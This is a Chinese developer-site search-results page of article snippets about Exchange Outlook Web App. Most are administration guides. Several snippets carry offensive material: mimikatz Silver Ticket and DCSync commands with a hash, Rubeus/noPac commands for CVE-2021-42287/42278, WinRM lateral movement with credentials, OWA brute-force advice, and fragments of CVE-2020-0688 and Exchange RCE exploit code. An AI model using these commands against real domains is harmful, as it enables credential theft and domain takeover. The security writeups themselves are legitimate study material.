展开

关键词

Exchange 2010 OWA Lync联系人列表故障案例

Exchange 2010 OWA 与 Lync 2010 的IM集成已经稳定运行几年,突然接用户反馈打开Exchange 2010 Outlook Web App 没有联系人列表项,无法展开与 Exchange 2010客户端访问服务器(CAS)一共3台,排查发现用户登录OWA是第2台,手动切换到第1、3台联系人列表正常。       最终决定针对CAS03重建OWA虚拟目录使用的Lync服务器配置,具体操作参考如下文档: https://technet.microsoft.com/zh-cn/library/gg420962.aspx 微软官方,没有操作详图】 http://www.exchangecn.com/exchange2010/20141130_521.html 【Exchange中文网,详细的集成配置图示】     重建OWA 希望此案例可以帮忙做Exchange 2010与Lync 2010 OWA与IM集成的朋友。

27310

Exchange 2010 重定向OWA访问后会话超时解决办法

修改了IIS重定向OWA,并在OWA中去掉了要求SSL,登录后不能打开邮箱、新建邮件等会话,提示:“无法完成您的请求。发生这种情可能是由于安全原因或会话超时” ? 解决办法: 经过一系列排错,问题很快定位到OWA SSL上,解决办法如下: 1、登录CAS服务器,依次打开\ Program Files \ Microsoft \ Exchange Server \ <version> \ ClientAccess \ Owa. 2、用记事本打开web.config。 4、修改httpCookies = "false" requireSSL = "true" domain = "",将requireSSL = "true"修改为"false" 5、重启IIS,登录OWA

40840
  • 广告
    关闭

    腾讯云精选爆品盛惠抢购

    腾讯云精选爆款云服务器限时体验20元起,还有更多热门云产品满足您的上云需求

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    【工作】Proxy Server的优化 - 检测目标网站URL变化

    在工作中,我在组里负责一个Proxy(代理)的Module,这个Module是针对微软的Office 365的邮件门户OWA实现,工作起来后,用户访问Office 365 OWA,无需再输入Office 365的网址,只需输入我们Proxy的地址,然后我们会将请求转送到Office 365 OWA,达到用户访问的目的,并使用户的体验如同实际访问Office 365 OWA一样。    /scripts/boot.worldwide.1.mouse.js, 200 9 /owa/ev.owa2, 200 10 /owa/ev.owa2, 200 11 /___/outlook.office365 .com/, 302 12 /owa/ev.owa2, 200 13 /owa/, 302 14 /__/login/login.srf, 200 15 /owa/ev.owa2, 200 16 /owa /scripts/boot.worldwide.0.mouse.js, 200 21 /owa/ev.owa2, 200 22 /owa/ev.owa2, 200 23 /owa/service.svc

    43180

    APT34黑客组织工具泄露事件分析

    owa/auth/getidtoken.aspx hxxps://95.0.139.4/owa/auth/logon.aspx hxxps://1.202.179.13/owa/auth/error1. /owa/auth/error3.aspx hxxps://180.169.13.230/owa/auth/error1.aspx hxxps://210.22.172.26/owa/auth/error1 222.66.8.76/owa/auth/error1.aspx hxxps://58.210.216.113/owa/auth/error1.aspx hxxps://60.247.31.237/owa /owa/auth/logon.aspx hxxps://195.12.113.50/owa/auth/error3.aspx hxxps://78.100.87.199/owa/auth/logon.aspx /owa/auth/error3.aspx hxxps://213.131.83.73/owa/auth/error4.aspx hxxps://187.174.201.179/owa/auth/error1

    80610

    攻击新姿势:通过入侵Outlook Web应用(OWA)服务器来破坏机构网络

    研究人员发现了一种先进的恶意软件,它可以通过感染机构的Outlook Web应用(OWA)邮件服务器来破坏机构的网络。 OWA的这个配置创建了一个理想的攻击平台,因为服务器同时暴露在内部和外部。因为OWA认证是基于域凭据的,所以获取访问OWA服务器权限的人将成为整个机构的域凭据的拥有者。” ? 攻击原理介绍 Cybereason的专家们发现了一个可疑的DLL“OWAAUTH.dll”,它与用于身份认证机制的合法OWA DLL名字相同。 这些恶意代码提供了存在于目标系统中的完整功能性后门,它允许攻击者操纵OWA服务器上的文件,并使其能够执行命令和任意代码。 Cybereason报告中继续陈述道: 根据定义,OWA要求机构定义一组相对宽松的限制;在这种情况下,OWA配置的方式允许以面向互联网的方式访问服务器,这使得黑客能够在几个月的时间段内不被检测到的情况下

    95760

    SharePoint 2013 Farm 安装指南——构建一个双层SharePoint Farm

    2013图解教程——Part 1 利用AutoSPSourceBuilder和Autospinstaller自动安装SharePoint Server 2013图解教程——Part 2 安装并配置OWA 验证是否成功创建,在浏览器键入以下地址,如返回如下图所示的XML就代表创建成功(注:我在DC上已经加了一个OWA2013的A地址,IP指向自己(OWA Server),如下所示:) ?   查看返回的XML信息,以验证是否创建成功,地址(http://owa2013.zoo.com/hosting/discovery)如下所示: ?   最后创建SharePoint和OWA Server的绑定 New-SPWOPIBinding -ServerName violet -AllowHTTP  Set-SPWOPIZone –zone 2013 中,确保不是作为系统帐户登录的(如当前登录的用户名显示为 sharepoint\system,该用户就无法使用 Office Web Apps 编辑或查看文档) 一切都成功过后,即可以使用OWA

    37190

    白银票据(Silver Ticket)攻击

    在当前域用户 mary 查询域控制器的共享目录的访问权限,发现没有权限: dir \\OWA2010CN-God\c$ ? 这个时候就能访问到域控的共享目录了: dir \\OWA2010CN-God\c$ ? 获取到的: Username : OWA2010CN-GOD$ NTLM : 78c403b6e04402158d26c5581f9e954b 然后为了防止其他票据对实验进行干扰,我们先清除内存中的票据 (域 mary 机器) kerberos::golden /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /target:OWA2010CN-God.god.org 这个时候输入命令,使用 dcsync 在域控制器中查询 krbtgt 的密码哈希值: lsadump::dcsync /dc:OWA2010CN-God.god.org /domain:god.org

    87920

    针对exchange的攻击方式

    接口和协议 OWA owa即 outlook web app,即outlook的网页版。 在exchange server 2019 中,由于只细分了邮箱服务器和边缘传输服务器,所以开放了如OWA,ECP等接口的服务器即为邮箱服务器。 发现 端口扫描 exchange会对外暴露接口如OWA,ECP等,所以我们可以通过一些端口特征来发现exchange。 setspn -q */* 特殊域名 https://autodiscover.domain.com/autodiscover/autodiscover.xml https://owa.domian/ / 早期的Outlook还使用称为Outlook Anywhere的RPC交互 工具使用 https://github.com/vysec/checkO365 版本确定 可以通过OWA,ECP的HTML

    14720

    Exchange中限制部分用户外网访问

    使用一台反向代理设备来提供邮件系统公网发布,用户通过Internet访问OWA或者outlook anywhere、activesync的时候,如果是部分被限制的用户,那么反向代理就阻止访问请求。 我们把这部分用户添加到一个安全组中,然后通过IIS授权规则来对OWA、RPC(目的限制outlook anywhere)、EWS(目的限制mac的邮件访问)目录访问进行限制,然后在内网重新部署一台CAS 3、完成安装后,打开IIS管理器,选择OWA虚拟目录,然后双击授权规则 ? 4、在右侧操作窗口选择添加拒绝规则 ? 配置完毕,下面测试一下外部owa的访问,输入账号密码提示密码错误无法登陆了。 ? 打开outlook客户端,同样也提示登录失败。 ?

    65210

    Exchange Server无法登录ECP,显示500意外错误?修复经验分享给你

    有一客户的Exchange Server出问题了,Outlook客户端突然无法收发邮件,而且连OWA都无法登录,管理员想登录管理后台的时候才发现,输入管理员账号和密码后,ECP管理界面直接崩溃了,只显示 准备移除 OWA 虚拟目录,再重新创建试试,打开Exchange Management Shell,输入命令:Remove-OwaVirtualDirectory 'ServerName\owa (Default Web Site)' //‘ServerNameE’为 exchange 主机名称;然而,移除失败了; 创建 OWA 虚拟目录的命令:New-OwaVirtualDirectory -WebSiteName

    6820

    Skype for Business Server 2015和 Exchange Server 2013集成

    6、OWA集成IM ? 然后输入以下命令来获取OWA的虚拟目录信息,并为其设置开启IM功能: Get-OwaVirtualDirectory | Set-OwaVirtualDirectory -InstantMessagingEnable 然后我们打开资源管理器定位到x:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\Owa,找到web.config文件,右键选择打开方式 \Appcmd.exe recycle apppool /apppool.name:"MSExchangeOWAAppPool" 进行OWA虚拟目录的资源回收,以便我们刚刚修改的内容生效。 ? 然后我们再次打开OWA,这时右上角的IM功能就可以正常使用了。其实OWA里的IM功能区块一直有,但如果不做以上配置是无法正常使用的。这里我们就可以单击登录到IM进行登录了。 ?

    39820

    T1028: WinRM for Lateral Movement

    address=*+transport=HTTP #删除 listener winrm id -r:OWA2010SP3 -auth:kerberos -u:administrator@0day.org @#45 winrm get winrm/config -r:OWA2010SP3 -auth:kerberos -u:administrator@0day.org -p:Admin! New-PSSession -ComputerName OWA2010SP3 -Credentia 0day\Administrator Enter-PSSession id ? Observations 在OWA2010SP3上可以看到父进程是wsmprovhost: ? Kibana中搜索calc*: ? 该日志来源于事件查看器中的sysmon: ? 在OWA2010SP3上查看日志: ?

    23930

    只需要一个域用户即可拿到 DC 权限(CVE-2021-42287 and CVE-2021-42278)

    漏洞环境 在这里我使用的是渗透攻击红队的内网域渗透靶场:redteam.red 域 IP 机器名 用户名:密码 10.10.10.8(DC) owa redteam/Administrator:Admin12345 4、reset the computer name(重设机器名称) Set-MachineAccountAttribute -MachineAccount saulgoodman -Value "owa /Rubeus.exe asktgt /user:owa /password:whoami /domian:redteam.red /dc:owa.redteam.red /nowrap 6、Change /Rubeus.exe s4u /self /impersonateuser:"Administrator" /altservice:"ldap/owa.redteam.red" /dc:"owa.redteam.red /noPac.exe -domain redteam.red -user saul -pass 'Red12345' /dc owa.redteam.red /mAccount saulgoodman

    12810

    Exchange Server 2013配置邮件流与外部访问

    2.选择”OWA“进行编辑,如果有多台服务器的话,这里可以按照服务器类型来选择服务器。 ? 3.在外部URL填入OWA的外网访问地址。保存。 ? 三、开启outlook anywhere。

    52920

    Lync Server 2013 部署前端池支持NLB吗?

    resource usage (especially CPU) on server nodes, important for all HTTP/S based applications like Exchange OWA persistence or scheduling methods, especially important for mobile clients, SharePoint, RDS and Exchange OWA Cannot provide pre-authentication and SSO functionality , especially important for Exchange OWA and Sharepoint

    29340

    Exchange Server 2013安装部署初体验

    3.OWA体验,OWA的风格已经完全变了。 ? 4.登录进去,界面更为简洁。 ? 4.新建邮件,不在是弹出的窗口了。 ? 5.新建联系人,界面也有很大的更改,所有操作均在一屏完成。 ?

    1.3K20

    Exchange漏洞攻略来啦!!

    对内网环境中的 Exchange 可以尝试遍历ip地址,收集https:\\ip\owa的返回信息判断。 1、owa登录爆破 通常情况下,Exchange 系统是不会对邮箱登录次数做限制的,因此,利用大字典来进行爆破,是最为简易和最为常见的一种突破方法。 因此如果直接使用 owa 页面爆破,用户名需要尝试全部三种方式。 爆破方式使用 burp 即可,通过返回包长短即可判断成功与否。 1、通过Outlook Web Access(OWA) 需要获得邮件用户的明文口令,登录OWA后,选择联系人->All Users。 https://domainname/owa/#path=/people 使用该目录获取通讯录列表,可以通过burp修改返回邮件地址数量导出。之后使用正则匹配即可,但操作相对繁琐。

    64820

    Microsoft Exchange Server 远程代码执行

    res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/owa/ end if res.headers['X-OWA-Version'] build = res.headers['X-OWA-Version'] if vuln_builds.any res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/owa/ end if res.code == 200 && ((%r{/owa/(?<build>\d+\.\d+\.\d+\. \d+)} =~ res.body) || (%r{/owa/auth/(?<build>\d+\.\d+\.\d+\.

    17240

    Exchange Server 2013之CAS服务器NLB负载均衡

    17.完成后使用刚才的集群IP打开OWA,正常。 ? 18.登录到OWA也正常,完成CAS的负载均衡配置。 ?

    70120

    CVE-2020-0688-微软Exchange服务器静态密钥缺陷导致远程代码EXP

    ysoserial-1.32/" session = requests.Session() def get_value(url, user, pwd): print("[*] Tring to login owa true; PBack=0"} cookies = {"PBack": "0", "PrivateComputer": "true"} login_url = base_url + '/owa /auth.owa' print("[+] Login url: {}".format(login_url)) try: login = session.post(login_url () parser.add_argument("-s", "--server", required=True, help="ECP Server URL Example: http://ip/owa show this help message and exit -s SERVER, --server ECP Server URL Example: http://ip/owa

    77320

    扫码关注腾讯云开发者

    领取腾讯云代金券